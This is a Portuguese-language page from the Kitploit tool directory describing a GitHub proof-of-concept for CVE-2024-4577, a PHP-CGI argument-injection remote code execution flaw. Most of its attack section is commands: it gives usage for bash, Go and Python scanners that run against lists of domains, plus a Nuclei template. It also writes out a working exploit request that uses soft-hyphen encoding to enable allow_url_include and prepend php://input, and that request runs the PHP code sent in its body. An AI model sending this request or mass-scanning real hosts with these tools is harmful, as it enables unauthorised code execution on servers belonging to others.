Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-4577-PHP-RCE — PoC de RCE em PHP para CVE-2024-4577 escrito em bash, go, python e um template nuclei | Kitploit
Ferramentas/GitHubGitHub/zephrfish/cve-2024-4577-php-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubzephrfish/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

PoC de RCE em PHP para CVE-2024-4577 escrito em bash, go, python e um template nuclei

Ver Repositório
33132há 1 mêsRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PHP RCE PoC

CVE-2024-4577: Injeção de Argumentos no PHP-CGI

Visão Geral

Este repositório contém scripts para verificar a vulnerabilidade CVE-2024-4577, um problema de injeção de argumentos no PHP-CGI. Você pode usar os scripts Bash, Go e Python fornecidos para testar uma lista de domínios quanto a essa vulnerabilidade. Também publiquei um arquivo YAML para Nuclei.

Uso

Script Bash

Para usar o script Bash, execute o seguinte comando:

root@kitploit:~
./CVE-2024-4577.sh /caminho/para/lista-de-dominios

Script Go

Primeiro, salve o script Go em um arquivo chamado CVE-2024-4577.go. Para compilar e executar o script Go:

  1. Compile o script Go em um binário:

    root@kitploit:~
    go build -o CVE-2024-4577 CVE-2024-4577.go
    
  • Execute o binário com o arquivo de lista de domínios como argumento:

    root@kitploit:~
    ./CVE-2024-4577 /caminho/para/lista-de-dominios
    
  • Script Python

    Primeiro, salve o script Python em um arquivo chamado CVE-2024-4577.py. Para executar o script Python:

    1. Certifique-se de ter a biblioteca requests instalada:

      root@kitploit:~
      pip install requests
      
    2. Execute o script Python com o arquivo de lista de domínios como argumento:

      root@kitploit:~
      python CVE-2024-4577.py /caminho/para/lista-de-dominios
      
    3. (Opcional) Se desejar exibir apenas hosts vulneráveis:

      root@kitploit:~
      python CVE-2024-4577.py /caminho/para/lista-de-dominios --quiet
      

    Prova de Conceito (PoC) Explicada

    Para testar manualmente a vulnerabilidade, você pode enviar a seguinte requisição POST:

    root@kitploit:~
    POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
    Host: {{host}}
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
    Accept: */*
    Content-Length: 23
    Content-Type: application/x-www-form-urlencoded
    Connection: keep-alive
    
    <?php phpinfo(); ?>
    

    Template Nuclei

    Também criei um template Nuclei para escanear instâncias vulneráveis; ele usa o esquema de layout v3 e foi testado em ambiente de laboratório:

    root@kitploit:~
    nuclei -t CVE-2024-4577.yaml -u <url-alvo>
    

    Exemplo de Lista de Domínios

    A lista de domínios deve ser prefixada com http/https para garantir que sejam lidos corretamente.

    root@kitploit:~
    http://example.com
    http://testsite.com
    http://vulnerablesite.com
    

    Exemplo de Saída

    Se um domínio for considerado vulnerável, a saída será:

    root@kitploit:~
    http://example.com: Vulnerável
    http://vulnerablesite.com: Vulnerável
    
    Baixar ferramenta